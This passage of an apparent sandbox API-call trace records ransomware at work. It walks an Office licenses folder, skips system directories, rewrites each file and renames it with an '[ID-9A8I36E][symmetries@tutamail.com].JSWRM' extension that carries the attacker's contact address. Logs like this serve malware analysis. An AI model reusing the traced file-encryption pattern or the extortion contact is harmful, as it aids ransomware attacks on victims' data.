hHeap=0x1e0000) returned 1 [0107.833] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_Subscription-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subscription-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_Subscription-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subscription-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0107.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0107.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0107.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.836] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.836] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe90ecec6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe90ecec6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe91abab2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x53a0, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProO365R_Subscription-ppd.xrm-ms", cAlternateFileName="PR2D5B~1.XRM")) returned 1 [0107.836] lstrcmpiW (lpString1="ProjectProO365R_Subscription-ppd.xrm-ms", lpString2=".") returned 1 [0107.836] lstrcmpiW (lpString1="ProjectProO365R_Subscription-ppd.xrm-ms", lpString2="..") returned 1 [0107.836] lstrcmpiW (lpString1="ProjectProO365R_Subscription-ppd.xrm-ms", lpString2="...") returned 1 [0107.836] lstrcmpiW (lpString1="ProjectProO365R_Subscription-ppd.xrm-ms", lpString2="windows") returned -1 [0107.836] lstrcmpiW (lpString1="ProjectProO365R_Subscription-ppd.xrm-ms", lpString2="recovery") returned -1 [0107.836] lstrcmpiW (lpString1="ProjectProO365R_Subscription-ppd.xrm-ms", lpString2="perflogs") returned 1 [0107.836] lstrcmpiW (lpString1="ProjectProO365R_Subscription-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0107.836] lstrcmpiW (lpString1="ProjectProO365R_Subscription-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.836] lstrcmpiW (lpString1="ProjectProO365R_Subscription-ppd.xrm-ms", lpString2="system volume information") returned -1 [0107.836] lstrcmpiW (lpString1="ProjectProO365R_Subscription-ppd.xrm-ms", lpString2="msocache") returned 1 [0107.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0107.836] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_Subscription-ppd.xrm-ms", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0107.836] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_Subscription-ppd.xrm-ms", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProO365R_Subscription-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 39 [0107.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0107.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0107.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_Subscription-ppd.xrm-ms", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0107.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_Subscription-ppd.xrm-ms", cchWideChar=39, lpMultiByteStr=0x22d0a0, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProO365R_Subscription-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 39 [0107.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0107.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0107.837] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0107.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.837] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0107.837] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_Subscription-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subscription-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.837] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=21408) returned 1 [0107.837] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.837] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x53a0) returned 0x24c1d0 [0107.837] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x53a0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x53a0, lpOverlapped=0x0) returned 1 [0107.842] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.842] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x53a0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x53a0, lpOverlapped=0x0) returned 1 [0107.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.843] CloseHandle (hObject=0x45c) returned 1 [0107.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0107.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0107.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0107.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0107.843] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0107.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0107.843] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0107.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0107.843] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0107.843] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_Subscription-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subscription-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_Subscription-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subscription-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0107.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0107.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0107.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.844] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.844] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe90c6c9f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe90c6c9f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe940e069, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d82, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProO365R_Subscription-ul-oob.xrm-ms", cAlternateFileName="PR455A~1.XRM")) returned 1 [0107.844] lstrcmpiW (lpString1="ProjectProO365R_Subscription-ul-oob.xrm-ms", lpString2=".") returned 1 [0107.844] lstrcmpiW (lpString1="ProjectProO365R_Subscription-ul-oob.xrm-ms", lpString2="..") returned 1 [0107.844] lstrcmpiW (lpString1="ProjectProO365R_Subscription-ul-oob.xrm-ms", lpString2="...") returned 1 [0107.844] lstrcmpiW (lpString1="ProjectProO365R_Subscription-ul-oob.xrm-ms", lpString2="windows") returned -1 [0107.844] lstrcmpiW (lpString1="ProjectProO365R_Subscription-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0107.844] lstrcmpiW (lpString1="ProjectProO365R_Subscription-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0107.844] lstrcmpiW (lpString1="ProjectProO365R_Subscription-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0107.844] lstrcmpiW (lpString1="ProjectProO365R_Subscription-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.845] lstrcmpiW (lpString1="ProjectProO365R_Subscription-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0107.845] lstrcmpiW (lpString1="ProjectProO365R_Subscription-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0107.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x2330f8 [0107.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_Subscription-ul-oob.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0107.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_Subscription-ul-oob.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22d260, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProO365R_Subscription-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0107.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2330f8 | out: hHeap=0x1e0000) returned 1 [0107.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0107.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_Subscription-ul-oob.xrm-ms", cchWideChar=42, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0107.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_Subscription-ul-oob.xrm-ms", cchWideChar=42, lpMultiByteStr=0x22d298, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProO365R_Subscription-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 42 [0107.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0107.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0107.845] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0107.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.845] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.845] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0107.845] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_Subscription-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subscription-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.846] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11650) returned 1 [0107.846] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.846] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d80) returned 0x24c1d0 [0107.846] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d80, lpOverlapped=0x0) returned 1 [0107.849] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.849] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d80, lpOverlapped=0x0) returned 1 [0107.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.849] CloseHandle (hObject=0x45c) returned 1 [0107.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24ba88 [0107.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0107.849] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0107.849] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0107.849] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0107.850] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0107.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0107.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22dff8 [0107.850] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0107.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22dff8 | out: hHeap=0x1e0000) returned 1 [0107.850] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0107.850] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_Subscription-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subscription-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_Subscription-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subscription-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0107.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0107.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0107.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0107.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0107.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0107.851] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe915f5fe, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe915f5fe, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe91f7f63, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2baf, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectProO365R_SubTest-pl.xrm-ms", cAlternateFileName="PR8F2A~1.XRM")) returned 1 [0107.851] lstrcmpiW (lpString1="ProjectProO365R_SubTest-pl.xrm-ms", lpString2=".") returned 1 [0107.851] lstrcmpiW (lpString1="ProjectProO365R_SubTest-pl.xrm-ms", lpString2="..") returned 1 [0107.851] lstrcmpiW (lpString1="ProjectProO365R_SubTest-pl.xrm-ms", lpString2="...") returned 1 [0107.851] lstrcmpiW (lpString1="ProjectProO365R_SubTest-pl.xrm-ms", lpString2="windows") returned -1 [0107.851] lstrcmpiW (lpString1="ProjectProO365R_SubTest-pl.xrm-ms", lpString2="recovery") returned -1 [0107.851] lstrcmpiW (lpString1="ProjectProO365R_SubTest-pl.xrm-ms", lpString2="perflogs") returned 1 [0107.851] lstrcmpiW (lpString1="ProjectProO365R_SubTest-pl.xrm-ms", lpString2="documents and settings") returned 1 [0107.851] lstrcmpiW (lpString1="ProjectProO365R_SubTest-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0107.851] lstrcmpiW (lpString1="ProjectProO365R_SubTest-pl.xrm-ms", lpString2="system volume information") returned -1 [0107.851] lstrcmpiW (lpString1="ProjectProO365R_SubTest-pl.xrm-ms", lpString2="msocache") returned 1 [0107.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c3d8 [0107.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_SubTest-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0107.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0107.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_SubTest-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22d0a0, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProO365R_SubTest-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0107.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c3d8 | out: hHeap=0x1e0000) returned 1 [0107.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0107.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_SubTest-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 33 [0107.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0107.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectProO365R_SubTest-pl.xrm-ms", cchWideChar=33, lpMultiByteStr=0x22ce70, cbMultiByte=33, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectProO365R_SubTest-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 33 [0107.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0107.851] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0107.851] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0107.851] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0107.852] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0107.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0107.852] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectProO365R_SubTest-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectproo365r_subtest-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0107.852] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11183) returned 1 [0107.852] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.852] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2ba0) returned 0x24c1d0 [0107.852] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2ba0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2ba0, lpOverlapped=0x0) returned 1 [0107.871] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0107.871] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2ba0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2ba0, lpOverlapped=0x0) returned 1 [0107.871] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0107.871] CloseHandle (hObject=0x45c) returned 1 [0107.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0107.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0107.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0107.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0107.872] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0107.872] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 